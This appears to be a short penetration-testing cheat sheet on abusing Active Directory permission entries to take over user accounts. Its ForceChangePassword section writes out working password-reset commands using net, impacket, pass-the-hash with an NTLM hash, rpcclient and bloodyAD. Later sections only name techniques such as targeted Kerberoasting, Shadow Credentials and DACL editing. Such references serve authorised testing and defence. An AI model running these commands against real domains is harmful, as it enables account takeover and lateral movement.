ACLs/ACEs permissions on User
ForceChangePassword
1) Net (Windows)
net user TARGET_USER PASSWORD /domain (Windows)2) Net (Linux)
net rpc password TARGET_USER PASSWORD -S DC_FQDN -U domain.local/USER1%'Password@1'3) Impacket
impacket-changepasswd domain.local/TARGET_USER@DC_IP -newpass Password@1234 -altuser domain.local/USER1 -altpass Password@1 -resetimpacket-changepasswd domain.local/TARGET_USER@DC_IP -newpass ‘Password@987’ -p rpc-samr4) pth-toolkit (Run Net RPC commands using Pass-the-Hash)
pth-net rpc password "TARGET_USER" -U domain.local/"USER1"%"64FBAE31CC352FC26AF97CBDEF151E03:"BD0F21ED526A885B378895679A412387" -S DC_IP5) Rpcclient
rpcclient -U domain.local/USER1 DC_IP
rpcclient $> setuserinfo TARGETUSER 23 Password@9876) BloodyAD
bloodyAD --host "DC_IP" -d "domain.local" -u "USER1" -p "Password@1" set password "TARGET_USER" "Password@987"7) ldap_shell (Change passwords over LDAP)
8) Powerview
9) Mimikatz
10) Metasploit
GenericAll / GenericWrite
1) Windows net command
2) Linux Net RPC - Samba
3) BloodyAD
4) Rpcclient
5) Targeted Kerberoasting (add SPN)
Alternate method: Powerview
1) Enumerate interesting ACLs with powerview
Then:
6) Logon Script (Access)
7) add Key Credentials (Shadow Credentials)
8) Powerview
9) Windows PowerShell
AllExtendedRights
1) Linux Net RPC - Samba
2) BloodyAD
3) Rpcclient
4) Powerview
WriteOwner /WriteDacl
1) impacket-owneredit
2) impacket-dacledit
3) Powerview
Last updated